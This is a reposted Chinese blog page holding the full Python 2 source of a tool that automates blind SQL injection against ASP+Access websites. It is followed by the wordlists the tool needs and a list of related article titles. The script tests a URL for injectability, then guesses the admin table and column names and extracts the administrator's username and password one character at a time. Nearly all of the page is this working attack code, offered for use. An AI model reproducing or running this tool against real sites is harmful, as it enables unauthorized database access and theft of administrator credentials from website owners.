[转载]Python实现ASP+ACCESS注入的工具源代码
来源:互联网 发布:exchange 域名 编辑:程序博客网 时间:2024/04/30 02:48
Code:#!/usr/bin/python # ASP ACCESS SQL Injection Test # Written by ToToDoDo (QQ:8924007) Email: [email]osbbs@osbbs.com[/email] from sys import exit from urllib import urlopen from string import join,strip from re import search def get_tablename(): tablefile = open("table.txt") for line in tablefile.readlines(): line = strip(line) sql = join(['%20and%20exists%20(select%20*%20from%20',line,')'],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "Error:",line else: print "Found the admin table name:", line,"/n" print "Now! Start to get name column from",line,"table" get_namecolumn(line) print "Now! Start to get password column from",line,"table" get_passwordcolumn(line) break def get_namecolumn(tablename): namecolumn = open("namecolumn.txt") for namecolumnline in namecolumn.readlines(): namecolumnline = strip(namecolumnline) sql = join(['%20and%20exists%20(select%20',namecolumnline,'%20from%20',tablename,')'],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "Error:",namecolumnline else: print "Found the name column from admin table:", namecolumnline,"/n" get_usernamelenth(tablename,namecolumnline) break def get_passwordcolumn(tablename): passwordcolumn = open("passwordcolumn.txt") for passwordcolumnline in passwordcolumn.readlines(): passwordcolumnline = strip(passwordcolumnline) sql = join(['%20and%20exists%20(select%20',passwordcolumnline,'%20from%20',tablename,')'],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "Error:",passwordcolumnline else: print "Found the password column from admin table:", passwordcolumnline,"/n" get_passwordlenth(tablename,passwordcolumnline) break def get_usernamelenth(tablename,namecolumn): for x in range(1,51): sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',namecolumn,')=',str(x),')'],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "Error:",x else: print "Found the lenth of the username:", x,"/n" get_username(tablename,namecolumn,x) break def get_passwordlenth(tablename,passwordcolumn): for x in range(1,51): sql = join(['%20and%201=(select%20top%201%20Count(*)%20From%20',tablename,'%20where%20len(',passwordcolumn,')=',str(x),')'],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if not search(judge,htmlcodes): print "Error:",x else: print "Found the lenth of the password:", x,"/n" get_password(tablename,passwordcolumn,x) break def get_username(tablename,namecolumn,lenth): list = [] for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]: list.extend(x) global username username = '' for y in range(1,lenth+1): print "Now! Crack the left ",y," of the username","Waiting~~~~~~~" for z in list: sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",namecolumn,",",str(y),",","1))=",str(z),")"],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if search(judge,htmlcodes): username = join([username,chr(z)],'') break print "Found the username = :",username,"/n" def get_password(tablename,passwordcolumn,lenth): list = [] for x in [range(48,58),range(97,123),range(65,91),range(33,48),range(58,65),range(91,97),range(123,256),range(1,33)]: list.extend(x) global password password = '' for y in range(1,lenth+1): print "Now! Crack the left ",y," of the password","Waiting~~~~~~~" for z in list: sql = join(["%20and%201=(select%20top%201%20count(*)%20from%20",tablename,"%20where%20Asc(mid(",passwordcolumn,",",str(y),",","1))=",str(z),")"],'') urlfile = urlopen(url+sql) htmlcodes = urlfile.read() if search(judge,htmlcodes): password = join([password,chr(z)],'') break print "Found the password = :",password,"/n" print "/n########################################################################/n" print " ASP+ACCESS SQL Injection Scripts By ToToDoDo with Python 2.3.x(QQ:8924007)" print " Email: [email]osbbs@msn.com[/email]/n" print "========================================================================"; print """Usage: C:/Python23>python asp_inject.py Supply a URL to test inject = [url]http://127.0.0.1/article/list.asp?id=3[/url] Supply some string in correct page but not in error page to help this script to judge properly. Judge string = test/n""" print "########################################################################/n"; url = raw_input('Supply a URL to test inject = ') if url == '': print "U must supply a URL with '.asp?xxx=' in" exit(1) judge = raw_input("/nSupply some string in correct page but not in error page to help this script to judge properly./n/nJudge string = ") if judge == '': print "U must supply a string to help judge!" exit(1) a = '%20and%201=1' b = '%20and%201=2' urlfile_a = urlopen(url+a) urlfile_b = urlopen(url+b) htmlcodes_a = urlfile_a.read() htmlcodes_b = urlfile_b.read() if search(judge,htmlcodes_a) and not search(judge,htmlcodes_b): print "/n/n/nFound injection:",url,"/n/n/nNow,start to get the table name!","/n" get_tablename() print "/n/n/nThe admin's account name is ",username,"/nThe admin's password is ",password else: print "Can't be Injected" [Ctrl+A Select All]需要3个字典文件: table.txt: user userinfo admintable admin article_admin namecolumn.txt: name username u_name uname adminname passwordcolumn.txt pass adminpass pwd password passwd admin_pass admin_password
- [转载]Python实现ASP+ACCESS注入的工具源代码
- Python实现ASP+ACCESS注入,不用SOCKET
- ASP+Access注入
- ASP+Access注入
- [转载] 阅读源代码的工具介绍
- asp+Access手工注入案例
- access注入及工具使用
- tree工具实现的源代码
- 使用源代码分析工具分析ASP源代码的方法
- python实现ping的源代码
- ASP与ACCESS登录功能的实现
- 防止SQL注入式攻击的免费工具【转载】
- 解密ASP源代码(转载)
- 解密ASP源代码(转载)
- [转载]后门工具gina源代码
- ASP+ACCESS SQL注入漏洞修复代码
- asp+access sql手工注入步骤
- 省市联动菜单的源代码实现(access数据库版)
- 我在努力把BLOG做好
- 在局域网内搜索可用的SQLSERVER服务器
- 数据访问技术路线图
- SQL语句导入导出大全
- 第一次来
- [转载]Python实现ASP+ACCESS注入的工具源代码
- blog中的小玩意
- Don't settle for <html:error>
- 水滴石穿
- 一次刷新组的刷新过程
- MSDE安装和配置提示
- Learn Spring in spring(三)
- 在WebService中实现window身份验证的功能
- 水木清华BBS站务公告(二则)